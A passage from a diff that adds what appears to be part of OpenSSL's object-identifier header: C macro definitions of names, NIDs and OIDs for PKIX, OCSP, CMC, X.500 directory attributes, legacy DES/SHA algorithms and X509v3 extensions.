+
+#define SN_OCSP_sign		"OCSPSigning"
+#define LN_OCSP_sign		"OCSP Signing"
+#define NID_OCSP_sign		180
+#define OBJ_OCSP_sign		OBJ_id_kp,9L
+
+#define SN_dvcs		"DVCS"
+#define LN_dvcs		"dvcs"
+#define NID_dvcs		297
+#define OBJ_dvcs		OBJ_id_kp,10L
+
+#define SN_id_it_caProtEncCert		"id-it-caProtEncCert"
+#define NID_id_it_caProtEncCert		298
+#define OBJ_id_it_caProtEncCert		OBJ_id_it,1L
+
+#define SN_id_it_signKeyPairTypes		"id-it-signKeyPairTypes"
+#define NID_id_it_signKeyPairTypes		299
+#define OBJ_id_it_signKeyPairTypes		OBJ_id_it,2L
+
+#define SN_id_it_encKeyPairTypes		"id-it-encKeyPairTypes"
+#define NID_id_it_encKeyPairTypes		300
+#define OBJ_id_it_encKeyPairTypes		OBJ_id_it,3L
+
+#define SN_id_it_preferredSymmAlg		"id-it-preferredSymmAlg"
+#define NID_id_it_preferredSymmAlg		301
+#define OBJ_id_it_preferredSymmAlg		OBJ_id_it,4L
+
+#define SN_id_it_caKeyUpdateInfo		"id-it-caKeyUpdateInfo"
+#define NID_id_it_caKeyUpdateInfo		302
+#define OBJ_id_it_caKeyUpdateInfo		OBJ_id_it,5L
+
+#define SN_id_it_currentCRL		"id-it-currentCRL"
+#define NID_id_it_currentCRL		303
+#define OBJ_id_it_currentCRL		OBJ_id_it,6L
+
+#define SN_id_it_unsupportedOIDs		"id-it-unsupportedOIDs"
+#define NID_id_it_unsupportedOIDs		304
+#define OBJ_id_it_unsupportedOIDs		OBJ_id_it,7L
+
+#define SN_id_it_subscriptionRequest		"id-it-subscriptionRequest"
+#define NID_id_it_subscriptionRequest		305
+#define OBJ_id_it_subscriptionRequest		OBJ_id_it,8L
+
+#define SN_id_it_subscriptionResponse		"id-it-subscriptionResponse"
+#define NID_id_it_subscriptionResponse		306
+#define OBJ_id_it_subscriptionResponse		OBJ_id_it,9L
+
+#define SN_id_it_keyPairParamReq		"id-it-keyPairParamReq"
+#define NID_id_it_keyPairParamReq		307
+#define OBJ_id_it_keyPairParamReq		OBJ_id_it,10L
+
+#define SN_id_it_keyPairParamRep		"id-it-keyPairParamRep"
+#define NID_id_it_keyPairParamRep		308
+#define OBJ_id_it_keyPairParamRep		OBJ_id_it,11L
+
+#define SN_id_it_revPassphrase		"id-it-revPassphrase"
+#define NID_id_it_revPassphrase		309
+#define OBJ_id_it_revPassphrase		OBJ_id_it,12L
+
+#define SN_id_it_implicitConfirm		"id-it-implicitConfirm"
+#define NID_id_it_implicitConfirm		310
+#define OBJ_id_it_implicitConfirm		OBJ_id_it,13L
+
+#define SN_id_it_confirmWaitTime		"id-it-confirmWaitTime"
+#define NID_id_it_confirmWaitTime		311
+#define OBJ_id_it_confirmWaitTime		OBJ_id_it,14L
+
+#define SN_id_it_origPKIMessage		"id-it-origPKIMessage"
+#define NID_id_it_origPKIMessage		312
+#define OBJ_id_it_origPKIMessage		OBJ_id_it,15L
+
+#define SN_id_it_suppLangTags		"id-it-suppLangTags"
+#define NID_id_it_suppLangTags		784
+#define OBJ_id_it_suppLangTags		OBJ_id_it,16L
+
+#define SN_id_regCtrl		"id-regCtrl"
+#define NID_id_regCtrl		313
+#define OBJ_id_regCtrl		OBJ_id_pkip,1L
+
+#define SN_id_regInfo		"id-regInfo"
+#define NID_id_regInfo		314
+#define OBJ_id_regInfo		OBJ_id_pkip,2L
+
+#define SN_id_regCtrl_regToken		"id-regCtrl-regToken"
+#define NID_id_regCtrl_regToken		315
+#define OBJ_id_regCtrl_regToken		OBJ_id_regCtrl,1L
+
+#define SN_id_regCtrl_authenticator		"id-regCtrl-authenticator"
+#define NID_id_regCtrl_authenticator		316
+#define OBJ_id_regCtrl_authenticator		OBJ_id_regCtrl,2L
+
+#define SN_id_regCtrl_pkiPublicationInfo		"id-regCtrl-pkiPublicationInfo"
+#define NID_id_regCtrl_pkiPublicationInfo		317
+#define OBJ_id_regCtrl_pkiPublicationInfo		OBJ_id_regCtrl,3L
+
+#define SN_id_regCtrl_pkiArchiveOptions		"id-regCtrl-pkiArchiveOptions"
+#define NID_id_regCtrl_pkiArchiveOptions		318
+#define OBJ_id_regCtrl_pkiArchiveOptions		OBJ_id_regCtrl,4L
+
+#define SN_id_regCtrl_oldCertID		"id-regCtrl-oldCertID"
+#define NID_id_regCtrl_oldCertID		319
+#define OBJ_id_regCtrl_oldCertID		OBJ_id_regCtrl,5L
+
+#define SN_id_regCtrl_protocolEncrKey		"id-regCtrl-protocolEncrKey"
+#define NID_id_regCtrl_protocolEncrKey		320
+#define OBJ_id_regCtrl_protocolEncrKey		OBJ_id_regCtrl,6L
+
+#define SN_id_regInfo_utf8Pairs		"id-regInfo-utf8Pairs"
+#define NID_id_regInfo_utf8Pairs		321
+#define OBJ_id_regInfo_utf8Pairs		OBJ_id_regInfo,1L
+
+#define SN_id_regInfo_certReq		"id-regInfo-certReq"
+#define NID_id_regInfo_certReq		322
+#define OBJ_id_regInfo_certReq		OBJ_id_regInfo,2L
+
+#define SN_id_alg_des40		"id-alg-des40"
+#define NID_id_alg_des40		323
+#define OBJ_id_alg_des40		OBJ_id_alg,1L
+
+#define SN_id_alg_noSignature		"id-alg-noSignature"
+#define NID_id_alg_noSignature		324
+#define OBJ_id_alg_noSignature		OBJ_id_alg,2L
+
+#define SN_id_alg_dh_sig_hmac_sha1		"id-alg-dh-sig-hmac-sha1"
+#define NID_id_alg_dh_sig_hmac_sha1		325
+#define OBJ_id_alg_dh_sig_hmac_sha1		OBJ_id_alg,3L
+
+#define SN_id_alg_dh_pop		"id-alg-dh-pop"
+#define NID_id_alg_dh_pop		326
+#define OBJ_id_alg_dh_pop		OBJ_id_alg,4L
+
+#define SN_id_cmc_statusInfo		"id-cmc-statusInfo"
+#define NID_id_cmc_statusInfo		327
+#define OBJ_id_cmc_statusInfo		OBJ_id_cmc,1L
+
+#define SN_id_cmc_identification		"id-cmc-identification"
+#define NID_id_cmc_identification		328
+#define OBJ_id_cmc_identification		OBJ_id_cmc,2L
+
+#define SN_id_cmc_identityProof		"id-cmc-identityProof"
+#define NID_id_cmc_identityProof		329
+#define OBJ_id_cmc_identityProof		OBJ_id_cmc,3L
+
+#define SN_id_cmc_dataReturn		"id-cmc-dataReturn"
+#define NID_id_cmc_dataReturn		330
+#define OBJ_id_cmc_dataReturn		OBJ_id_cmc,4L
+
+#define SN_id_cmc_transactionId		"id-cmc-transactionId"
+#define NID_id_cmc_transactionId		331
+#define OBJ_id_cmc_transactionId		OBJ_id_cmc,5L
+
+#define SN_id_cmc_senderNonce		"id-cmc-senderNonce"
+#define NID_id_cmc_senderNonce		332
+#define OBJ_id_cmc_senderNonce		OBJ_id_cmc,6L
+
+#define SN_id_cmc_recipientNonce		"id-cmc-recipientNonce"
+#define NID_id_cmc_recipientNonce		333
+#define OBJ_id_cmc_recipientNonce		OBJ_id_cmc,7L
+
+#define SN_id_cmc_addExtensions		"id-cmc-addExtensions"
+#define NID_id_cmc_addExtensions		334
+#define OBJ_id_cmc_addExtensions		OBJ_id_cmc,8L
+
+#define SN_id_cmc_encryptedPOP		"id-cmc-encryptedPOP"
+#define NID_id_cmc_encryptedPOP		335
+#define OBJ_id_cmc_encryptedPOP		OBJ_id_cmc,9L
+
+#define SN_id_cmc_decryptedPOP		"id-cmc-decryptedPOP"
+#define NID_id_cmc_decryptedPOP		336
+#define OBJ_id_cmc_decryptedPOP		OBJ_id_cmc,10L
+
+#define SN_id_cmc_lraPOPWitness		"id-cmc-lraPOPWitness"
+#define NID_id_cmc_lraPOPWitness		337
+#define OBJ_id_cmc_lraPOPWitness		OBJ_id_cmc,11L
+
+#define SN_id_cmc_getCert		"id-cmc-getCert"
+#define NID_id_cmc_getCert		338
+#define OBJ_id_cmc_getCert		OBJ_id_cmc,15L
+
+#define SN_id_cmc_getCRL		"id-cmc-getCRL"
+#define NID_id_cmc_getCRL		339
+#define OBJ_id_cmc_getCRL		OBJ_id_cmc,16L
+
+#define SN_id_cmc_revokeRequest		"id-cmc-revokeRequest"
+#define NID_id_cmc_revokeRequest		340
+#define OBJ_id_cmc_revokeRequest		OBJ_id_cmc,17L
+
+#define SN_id_cmc_regInfo		"id-cmc-regInfo"
+#define NID_id_cmc_regInfo		341
+#define OBJ_id_cmc_regInfo		OBJ_id_cmc,18L
+
+#define SN_id_cmc_responseInfo		"id-cmc-responseInfo"
+#define NID_id_cmc_responseInfo		342
+#define OBJ_id_cmc_responseInfo		OBJ_id_cmc,19L
+
+#define SN_id_cmc_queryPending		"id-cmc-queryPending"
+#define NID_id_cmc_queryPending		343
+#define OBJ_id_cmc_queryPending		OBJ_id_cmc,21L
+
+#define SN_id_cmc_popLinkRandom		"id-cmc-popLinkRandom"
+#define NID_id_cmc_popLinkRandom		344
+#define OBJ_id_cmc_popLinkRandom		OBJ_id_cmc,22L
+
+#define SN_id_cmc_popLinkWitness		"id-cmc-popLinkWitness"
+#define NID_id_cmc_popLinkWitness		345
+#define OBJ_id_cmc_popLinkWitness		OBJ_id_cmc,23L
+
+#define SN_id_cmc_confirmCertAcceptance		"id-cmc-confirmCertAcceptance"
+#define NID_id_cmc_confirmCertAcceptance		346
+#define OBJ_id_cmc_confirmCertAcceptance		OBJ_id_cmc,24L
+
+#define SN_id_on_personalData		"id-on-personalData"
+#define NID_id_on_personalData		347
+#define OBJ_id_on_personalData		OBJ_id_on,1L
+
+#define SN_id_on_permanentIdentifier		"id-on-permanentIdentifier"
+#define LN_id_on_permanentIdentifier		"Permanent Identifier"
+#define NID_id_on_permanentIdentifier		858
+#define OBJ_id_on_permanentIdentifier		OBJ_id_on,3L
+
+#define SN_id_pda_dateOfBirth		"id-pda-dateOfBirth"
+#define NID_id_pda_dateOfBirth		348
+#define OBJ_id_pda_dateOfBirth		OBJ_id_pda,1L
+
+#define SN_id_pda_placeOfBirth		"id-pda-placeOfBirth"
+#define NID_id_pda_placeOfBirth		349
+#define OBJ_id_pda_placeOfBirth		OBJ_id_pda,2L
+
+#define SN_id_pda_gender		"id-pda-gender"
+#define NID_id_pda_gender		351
+#define OBJ_id_pda_gender		OBJ_id_pda,3L
+
+#define SN_id_pda_countryOfCitizenship		"id-pda-countryOfCitizenship"
+#define NID_id_pda_countryOfCitizenship		352
+#define OBJ_id_pda_countryOfCitizenship		OBJ_id_pda,4L
+
+#define SN_id_pda_countryOfResidence		"id-pda-countryOfResidence"
+#define NID_id_pda_countryOfResidence		353
+#define OBJ_id_pda_countryOfResidence		OBJ_id_pda,5L
+
+#define SN_id_aca_authenticationInfo		"id-aca-authenticationInfo"
+#define NID_id_aca_authenticationInfo		354
+#define OBJ_id_aca_authenticationInfo		OBJ_id_aca,1L
+
+#define SN_id_aca_accessIdentity		"id-aca-accessIdentity"
+#define NID_id_aca_accessIdentity		355
+#define OBJ_id_aca_accessIdentity		OBJ_id_aca,2L
+
+#define SN_id_aca_chargingIdentity		"id-aca-chargingIdentity"
+#define NID_id_aca_chargingIdentity		356
+#define OBJ_id_aca_chargingIdentity		OBJ_id_aca,3L
+
+#define SN_id_aca_group		"id-aca-group"
+#define NID_id_aca_group		357
+#define OBJ_id_aca_group		OBJ_id_aca,4L
+
+#define SN_id_aca_role		"id-aca-role"
+#define NID_id_aca_role		358
+#define OBJ_id_aca_role		OBJ_id_aca,5L
+
+#define SN_id_aca_encAttrs		"id-aca-encAttrs"
+#define NID_id_aca_encAttrs		399
+#define OBJ_id_aca_encAttrs		OBJ_id_aca,6L
+
+#define SN_id_qcs_pkixQCSyntax_v1		"id-qcs-pkixQCSyntax-v1"
+#define NID_id_qcs_pkixQCSyntax_v1		359
+#define OBJ_id_qcs_pkixQCSyntax_v1		OBJ_id_qcs,1L
+
+#define SN_id_cct_crs		"id-cct-crs"
+#define NID_id_cct_crs		360
+#define OBJ_id_cct_crs		OBJ_id_cct,1L
+
+#define SN_id_cct_PKIData		"id-cct-PKIData"
+#define NID_id_cct_PKIData		361
+#define OBJ_id_cct_PKIData		OBJ_id_cct,2L
+
+#define SN_id_cct_PKIResponse		"id-cct-PKIResponse"
+#define NID_id_cct_PKIResponse		362
+#define OBJ_id_cct_PKIResponse		OBJ_id_cct,3L
+
+#define SN_id_ppl_anyLanguage		"id-ppl-anyLanguage"
+#define LN_id_ppl_anyLanguage		"Any language"
+#define NID_id_ppl_anyLanguage		664
+#define OBJ_id_ppl_anyLanguage		OBJ_id_ppl,0L
+
+#define SN_id_ppl_inheritAll		"id-ppl-inheritAll"
+#define LN_id_ppl_inheritAll		"Inherit all"
+#define NID_id_ppl_inheritAll		665
+#define OBJ_id_ppl_inheritAll		OBJ_id_ppl,1L
+
+#define SN_Independent		"id-ppl-independent"
+#define LN_Independent		"Independent"
+#define NID_Independent		667
+#define OBJ_Independent		OBJ_id_ppl,2L
+
+#define SN_ad_OCSP		"OCSP"
+#define LN_ad_OCSP		"OCSP"
+#define NID_ad_OCSP		178
+#define OBJ_ad_OCSP		OBJ_id_ad,1L
+
+#define SN_ad_ca_issuers		"caIssuers"
+#define LN_ad_ca_issuers		"CA Issuers"
+#define NID_ad_ca_issuers		179
+#define OBJ_ad_ca_issuers		OBJ_id_ad,2L
+
+#define SN_ad_timeStamping		"ad_timestamping"
+#define LN_ad_timeStamping		"AD Time Stamping"
+#define NID_ad_timeStamping		363
+#define OBJ_ad_timeStamping		OBJ_id_ad,3L
+
+#define SN_ad_dvcs		"AD_DVCS"
+#define LN_ad_dvcs		"ad dvcs"
+#define NID_ad_dvcs		364
+#define OBJ_ad_dvcs		OBJ_id_ad,4L
+
+#define SN_caRepository		"caRepository"
+#define LN_caRepository		"CA Repository"
+#define NID_caRepository		785
+#define OBJ_caRepository		OBJ_id_ad,5L
+
+#define OBJ_id_pkix_OCSP		OBJ_ad_OCSP
+
+#define SN_id_pkix_OCSP_basic		"basicOCSPResponse"
+#define LN_id_pkix_OCSP_basic		"Basic OCSP Response"
+#define NID_id_pkix_OCSP_basic		365
+#define OBJ_id_pkix_OCSP_basic		OBJ_id_pkix_OCSP,1L
+
+#define SN_id_pkix_OCSP_Nonce		"Nonce"
+#define LN_id_pkix_OCSP_Nonce		"OCSP Nonce"
+#define NID_id_pkix_OCSP_Nonce		366
+#define OBJ_id_pkix_OCSP_Nonce		OBJ_id_pkix_OCSP,2L
+
+#define SN_id_pkix_OCSP_CrlID		"CrlID"
+#define LN_id_pkix_OCSP_CrlID		"OCSP CRL ID"
+#define NID_id_pkix_OCSP_CrlID		367
+#define OBJ_id_pkix_OCSP_CrlID		OBJ_id_pkix_OCSP,3L
+
+#define SN_id_pkix_OCSP_acceptableResponses		"acceptableResponses"
+#define LN_id_pkix_OCSP_acceptableResponses		"Acceptable OCSP Responses"
+#define NID_id_pkix_OCSP_acceptableResponses		368
+#define OBJ_id_pkix_OCSP_acceptableResponses		OBJ_id_pkix_OCSP,4L
+
+#define SN_id_pkix_OCSP_noCheck		"noCheck"
+#define LN_id_pkix_OCSP_noCheck		"OCSP No Check"
+#define NID_id_pkix_OCSP_noCheck		369
+#define OBJ_id_pkix_OCSP_noCheck		OBJ_id_pkix_OCSP,5L
+
+#define SN_id_pkix_OCSP_archiveCutoff		"archiveCutoff"
+#define LN_id_pkix_OCSP_archiveCutoff		"OCSP Archive Cutoff"
+#define NID_id_pkix_OCSP_archiveCutoff		370
+#define OBJ_id_pkix_OCSP_archiveCutoff		OBJ_id_pkix_OCSP,6L
+
+#define SN_id_pkix_OCSP_serviceLocator		"serviceLocator"
+#define LN_id_pkix_OCSP_serviceLocator		"OCSP Service Locator"
+#define NID_id_pkix_OCSP_serviceLocator		371
+#define OBJ_id_pkix_OCSP_serviceLocator		OBJ_id_pkix_OCSP,7L
+
+#define SN_id_pkix_OCSP_extendedStatus		"extendedStatus"
+#define LN_id_pkix_OCSP_extendedStatus		"Extended OCSP Status"
+#define NID_id_pkix_OCSP_extendedStatus		372
+#define OBJ_id_pkix_OCSP_extendedStatus		OBJ_id_pkix_OCSP,8L
+
+#define SN_id_pkix_OCSP_valid		"valid"
+#define NID_id_pkix_OCSP_valid		373
+#define OBJ_id_pkix_OCSP_valid		OBJ_id_pkix_OCSP,9L
+
+#define SN_id_pkix_OCSP_path		"path"
+#define NID_id_pkix_OCSP_path		374
+#define OBJ_id_pkix_OCSP_path		OBJ_id_pkix_OCSP,10L
+
+#define SN_id_pkix_OCSP_trustRoot		"trustRoot"
+#define LN_id_pkix_OCSP_trustRoot		"Trust Root"
+#define NID_id_pkix_OCSP_trustRoot		375
+#define OBJ_id_pkix_OCSP_trustRoot		OBJ_id_pkix_OCSP,11L
+
+#define SN_algorithm		"algorithm"
+#define LN_algorithm		"algorithm"
+#define NID_algorithm		376
+#define OBJ_algorithm		1L,3L,14L,3L,2L
+
+#define SN_md5WithRSA		"RSA-NP-MD5"
+#define LN_md5WithRSA		"md5WithRSA"
+#define NID_md5WithRSA		104
+#define OBJ_md5WithRSA		OBJ_algorithm,3L
+
+#define SN_des_ecb		"DES-ECB"
+#define LN_des_ecb		"des-ecb"
+#define NID_des_ecb		29
+#define OBJ_des_ecb		OBJ_algorithm,6L
+
+#define SN_des_cbc		"DES-CBC"
+#define LN_des_cbc		"des-cbc"
+#define NID_des_cbc		31
+#define OBJ_des_cbc		OBJ_algorithm,7L
+
+#define SN_des_ofb64		"DES-OFB"
+#define LN_des_ofb64		"des-ofb"
+#define NID_des_ofb64		45
+#define OBJ_des_ofb64		OBJ_algorithm,8L
+
+#define SN_des_cfb64		"DES-CFB"
+#define LN_des_cfb64		"des-cfb"
+#define NID_des_cfb64		30
+#define OBJ_des_cfb64		OBJ_algorithm,9L
+
+#define SN_rsaSignature		"rsaSignature"
+#define NID_rsaSignature		377
+#define OBJ_rsaSignature		OBJ_algorithm,11L
+
+#define SN_dsa_2		"DSA-old"
+#define LN_dsa_2		"dsaEncryption-old"
+#define NID_dsa_2		67
+#define OBJ_dsa_2		OBJ_algorithm,12L
+
+#define SN_dsaWithSHA		"DSA-SHA"
+#define LN_dsaWithSHA		"dsaWithSHA"
+#define NID_dsaWithSHA		66
+#define OBJ_dsaWithSHA		OBJ_algorithm,13L
+
+#define SN_shaWithRSAEncryption		"RSA-SHA"
+#define LN_shaWithRSAEncryption		"shaWithRSAEncryption"
+#define NID_shaWithRSAEncryption		42
+#define OBJ_shaWithRSAEncryption		OBJ_algorithm,15L
+
+#define SN_des_ede_ecb		"DES-EDE"
+#define LN_des_ede_ecb		"des-ede"
+#define NID_des_ede_ecb		32
+#define OBJ_des_ede_ecb		OBJ_algorithm,17L
+
+#define SN_des_ede3_ecb		"DES-EDE3"
+#define LN_des_ede3_ecb		"des-ede3"
+#define NID_des_ede3_ecb		33
+
+#define SN_des_ede_cbc		"DES-EDE-CBC"
+#define LN_des_ede_cbc		"des-ede-cbc"
+#define NID_des_ede_cbc		43
+
+#define SN_des_ede_cfb64		"DES-EDE-CFB"
+#define LN_des_ede_cfb64		"des-ede-cfb"
+#define NID_des_ede_cfb64		60
+
+#define SN_des_ede3_cfb64		"DES-EDE3-CFB"
+#define LN_des_ede3_cfb64		"des-ede3-cfb"
+#define NID_des_ede3_cfb64		61
+
+#define SN_des_ede_ofb64		"DES-EDE-OFB"
+#define LN_des_ede_ofb64		"des-ede-ofb"
+#define NID_des_ede_ofb64		62
+
+#define SN_des_ede3_ofb64		"DES-EDE3-OFB"
+#define LN_des_ede3_ofb64		"des-ede3-ofb"
+#define NID_des_ede3_ofb64		63
+
+#define SN_desx_cbc		"DESX-CBC"
+#define LN_desx_cbc		"desx-cbc"
+#define NID_desx_cbc		80
+
+#define SN_sha		"SHA"
+#define LN_sha		"sha"
+#define NID_sha		41
+#define OBJ_sha		OBJ_algorithm,18L
+
+#define SN_sha1		"SHA1"
+#define LN_sha1		"sha1"
+#define NID_sha1		64
+#define OBJ_sha1		OBJ_algorithm,26L
+
+#define SN_dsaWithSHA1_2		"DSA-SHA1-old"
+#define LN_dsaWithSHA1_2		"dsaWithSHA1-old"
+#define NID_dsaWithSHA1_2		70
+#define OBJ_dsaWithSHA1_2		OBJ_algorithm,27L
+
+#define SN_sha1WithRSA		"RSA-SHA1-2"
+#define LN_sha1WithRSA		"sha1WithRSA"
+#define NID_sha1WithRSA		115
+#define OBJ_sha1WithRSA		OBJ_algorithm,29L
+
+#define SN_ripemd160		"RIPEMD160"
+#define LN_ripemd160		"ripemd160"
+#define NID_ripemd160		117
+#define OBJ_ripemd160		1L,3L,36L,3L,2L,1L
+
+#define SN_ripemd160WithRSA		"RSA-RIPEMD160"
+#define LN_ripemd160WithRSA		"ripemd160WithRSA"
+#define NID_ripemd160WithRSA		119
+#define OBJ_ripemd160WithRSA		1L,3L,36L,3L,3L,1L,2L
+
+#define SN_sxnet		"SXNetID"
+#define LN_sxnet		"Strong Extranet ID"
+#define NID_sxnet		143
+#define OBJ_sxnet		1L,3L,101L,1L,4L,1L
+
+#define SN_X500		"X500"
+#define LN_X500		"directory services (X.500)"
+#define NID_X500		11
+#define OBJ_X500		2L,5L
+
+#define SN_X509		"X509"
+#define NID_X509		12
+#define OBJ_X509		OBJ_X500,4L
+
+#define SN_commonName		"CN"
+#define LN_commonName		"commonName"
+#define NID_commonName		13
+#define OBJ_commonName		OBJ_X509,3L
+
+#define SN_surname		"SN"
+#define LN_surname		"surname"
+#define NID_surname		100
+#define OBJ_surname		OBJ_X509,4L
+
+#define LN_serialNumber		"serialNumber"
+#define NID_serialNumber		105
+#define OBJ_serialNumber		OBJ_X509,5L
+
+#define SN_countryName		"C"
+#define LN_countryName		"countryName"
+#define NID_countryName		14
+#define OBJ_countryName		OBJ_X509,6L
+
+#define SN_localityName		"L"
+#define LN_localityName		"localityName"
+#define NID_localityName		15
+#define OBJ_localityName		OBJ_X509,7L
+
+#define SN_stateOrProvinceName		"ST"
+#define LN_stateOrProvinceName		"stateOrProvinceName"
+#define NID_stateOrProvinceName		16
+#define OBJ_stateOrProvinceName		OBJ_X509,8L
+
+#define SN_streetAddress		"street"
+#define LN_streetAddress		"streetAddress"
+#define NID_streetAddress		660
+#define OBJ_streetAddress		OBJ_X509,9L
+
+#define SN_organizationName		"O"
+#define LN_organizationName		"organizationName"
+#define NID_organizationName		17
+#define OBJ_organizationName		OBJ_X509,10L
+
+#define SN_organizationalUnitName		"OU"
+#define LN_organizationalUnitName		"organizationalUnitName"
+#define NID_organizationalUnitName		18
+#define OBJ_organizationalUnitName		OBJ_X509,11L
+
+#define SN_title		"title"
+#define LN_title		"title"
+#define NID_title		106
+#define OBJ_title		OBJ_X509,12L
+
+#define LN_description		"description"
+#define NID_description		107
+#define OBJ_description		OBJ_X509,13L
+
+#define LN_searchGuide		"searchGuide"
+#define NID_searchGuide		859
+#define OBJ_searchGuide		OBJ_X509,14L
+
+#define LN_businessCategory		"businessCategory"
+#define NID_businessCategory		860
+#define OBJ_businessCategory		OBJ_X509,15L
+
+#define LN_postalAddress		"postalAddress"
+#define NID_postalAddress		861
+#define OBJ_postalAddress		OBJ_X509,16L
+
+#define LN_postalCode		"postalCode"
+#define NID_postalCode		661
+#define OBJ_postalCode		OBJ_X509,17L
+
+#define LN_postOfficeBox		"postOfficeBox"
+#define NID_postOfficeBox		862
+#define OBJ_postOfficeBox		OBJ_X509,18L
+
+#define LN_physicalDeliveryOfficeName		"physicalDeliveryOfficeName"
+#define NID_physicalDeliveryOfficeName		863
+#define OBJ_physicalDeliveryOfficeName		OBJ_X509,19L
+
+#define LN_telephoneNumber		"telephoneNumber"
+#define NID_telephoneNumber		864
+#define OBJ_telephoneNumber		OBJ_X509,20L
+
+#define LN_telexNumber		"telexNumber"
+#define NID_telexNumber		865
+#define OBJ_telexNumber		OBJ_X509,21L
+
+#define LN_teletexTerminalIdentifier		"teletexTerminalIdentifier"
+#define NID_teletexTerminalIdentifier		866
+#define OBJ_teletexTerminalIdentifier		OBJ_X509,22L
+
+#define LN_facsimileTelephoneNumber		"facsimileTelephoneNumber"
+#define NID_facsimileTelephoneNumber		867
+#define OBJ_facsimileTelephoneNumber		OBJ_X509,23L
+
+#define LN_x121Address		"x121Address"
+#define NID_x121Address		868
+#define OBJ_x121Address		OBJ_X509,24L
+
+#define LN_internationaliSDNNumber		"internationaliSDNNumber"
+#define NID_internationaliSDNNumber		869
+#define OBJ_internationaliSDNNumber		OBJ_X509,25L
+
+#define LN_registeredAddress		"registeredAddress"
+#define NID_registeredAddress		870
+#define OBJ_registeredAddress		OBJ_X509,26L
+
+#define LN_destinationIndicator		"destinationIndicator"
+#define NID_destinationIndicator		871
+#define OBJ_destinationIndicator		OBJ_X509,27L
+
+#define LN_preferredDeliveryMethod		"preferredDeliveryMethod"
+#define NID_preferredDeliveryMethod		872
+#define OBJ_preferredDeliveryMethod		OBJ_X509,28L
+
+#define LN_presentationAddress		"presentationAddress"
+#define NID_presentationAddress		873
+#define OBJ_presentationAddress		OBJ_X509,29L
+
+#define LN_supportedApplicationContext		"supportedApplicationContext"
+#define NID_supportedApplicationContext		874
+#define OBJ_supportedApplicationContext		OBJ_X509,30L
+
+#define SN_member		"member"
+#define NID_member		875
+#define OBJ_member		OBJ_X509,31L
+
+#define SN_owner		"owner"
+#define NID_owner		876
+#define OBJ_owner		OBJ_X509,32L
+
+#define LN_roleOccupant		"roleOccupant"
+#define NID_roleOccupant		877
+#define OBJ_roleOccupant		OBJ_X509,33L
+
+#define SN_seeAlso		"seeAlso"
+#define NID_seeAlso		878
+#define OBJ_seeAlso		OBJ_X509,34L
+
+#define LN_userPassword		"userPassword"
+#define NID_userPassword		879
+#define OBJ_userPassword		OBJ_X509,35L
+
+#define LN_userCertificate		"userCertificate"
+#define NID_userCertificate		880
+#define OBJ_userCertificate		OBJ_X509,36L
+
+#define LN_cACertificate		"cACertificate"
+#define NID_cACertificate		881
+#define OBJ_cACertificate		OBJ_X509,37L
+
+#define LN_authorityRevocationList		"authorityRevocationList"
+#define NID_authorityRevocationList		882
+#define OBJ_authorityRevocationList		OBJ_X509,38L
+
+#define LN_certificateRevocationList		"certificateRevocationList"
+#define NID_certificateRevocationList		883
+#define OBJ_certificateRevocationList		OBJ_X509,39L
+
+#define LN_crossCertificatePair		"crossCertificatePair"
+#define NID_crossCertificatePair		884
+#define OBJ_crossCertificatePair		OBJ_X509,40L
+
+#define SN_name		"name"
+#define LN_name		"name"
+#define NID_name		173
+#define OBJ_name		OBJ_X509,41L
+
+#define SN_givenName		"GN"
+#define LN_givenName		"givenName"
+#define NID_givenName		99
+#define OBJ_givenName		OBJ_X509,42L
+
+#define SN_initials		"initials"
+#define LN_initials		"initials"
+#define NID_initials		101
+#define OBJ_initials		OBJ_X509,43L
+
+#define LN_generationQualifier		"generationQualifier"
+#define NID_generationQualifier		509
+#define OBJ_generationQualifier		OBJ_X509,44L
+
+#define LN_x500UniqueIdentifier		"x500UniqueIdentifier"
+#define NID_x500UniqueIdentifier		503
+#define OBJ_x500UniqueIdentifier		OBJ_X509,45L
+
+#define SN_dnQualifier		"dnQualifier"
+#define LN_dnQualifier		"dnQualifier"
+#define NID_dnQualifier		174
+#define OBJ_dnQualifier		OBJ_X509,46L
+
+#define LN_enhancedSearchGuide		"enhancedSearchGuide"
+#define NID_enhancedSearchGuide		885
+#define OBJ_enhancedSearchGuide		OBJ_X509,47L
+
+#define LN_protocolInformation		"protocolInformation"
+#define NID_protocolInformation		886
+#define OBJ_protocolInformation		OBJ_X509,48L
+
+#define LN_distinguishedName		"distinguishedName"
+#define NID_distinguishedName		887
+#define OBJ_distinguishedName		OBJ_X509,49L
+
+#define LN_uniqueMember		"uniqueMember"
+#define NID_uniqueMember		888
+#define OBJ_uniqueMember		OBJ_X509,50L
+
+#define LN_houseIdentifier		"houseIdentifier"
+#define NID_houseIdentifier		889
+#define OBJ_houseIdentifier		OBJ_X509,51L
+
+#define LN_supportedAlgorithms		"supportedAlgorithms"
+#define NID_supportedAlgorithms		890
+#define OBJ_supportedAlgorithms		OBJ_X509,52L
+
+#define LN_deltaRevocationList		"deltaRevocationList"
+#define NID_deltaRevocationList		891
+#define OBJ_deltaRevocationList		OBJ_X509,53L
+
+#define SN_dmdName		"dmdName"
+#define NID_dmdName		892
+#define OBJ_dmdName		OBJ_X509,54L
+
+#define LN_pseudonym		"pseudonym"
+#define NID_pseudonym		510
+#define OBJ_pseudonym		OBJ_X509,65L
+
+#define SN_role		"role"
+#define LN_role		"role"
+#define NID_role		400
+#define OBJ_role		OBJ_X509,72L
+
+#define SN_X500algorithms		"X500algorithms"
+#define LN_X500algorithms		"directory services - algorithms"
+#define NID_X500algorithms		378
+#define OBJ_X500algorithms		OBJ_X500,8L
+
+#define SN_rsa		"RSA"
+#define LN_rsa		"rsa"
+#define NID_rsa		19
+#define OBJ_rsa		OBJ_X500algorithms,1L,1L
+
+#define SN_mdc2WithRSA		"RSA-MDC2"
+#define LN_mdc2WithRSA		"mdc2WithRSA"
+#define NID_mdc2WithRSA		96
+#define OBJ_mdc2WithRSA		OBJ_X500algorithms,3L,100L
+
+#define SN_mdc2		"MDC2"
+#define LN_mdc2		"mdc2"
+#define NID_mdc2		95
+#define OBJ_mdc2		OBJ_X500algorithms,3L,101L
+
+#define SN_id_ce		"id-ce"
+#define NID_id_ce		81
+#define OBJ_id_ce		OBJ_X500,29L
+
+#define SN_subject_directory_attributes		"subjectDirectoryAttributes"
+#define LN_subject_directory_attributes		"X509v3 Subject Directory Attributes"
+#define NID_subject_directory_attributes		769
+#define OBJ_subject_directory_attributes		OBJ_id_ce,9L
+
+#define SN_subject_key_identifier		"subjectKeyIdentifier"
+#define LN_subject_key_identifier		"X509v3 Subject Key Identifier"
+#define NID_subject_key_identifier		82
+#define OBJ_subject_key_identifier		OBJ_id_ce,14L
+
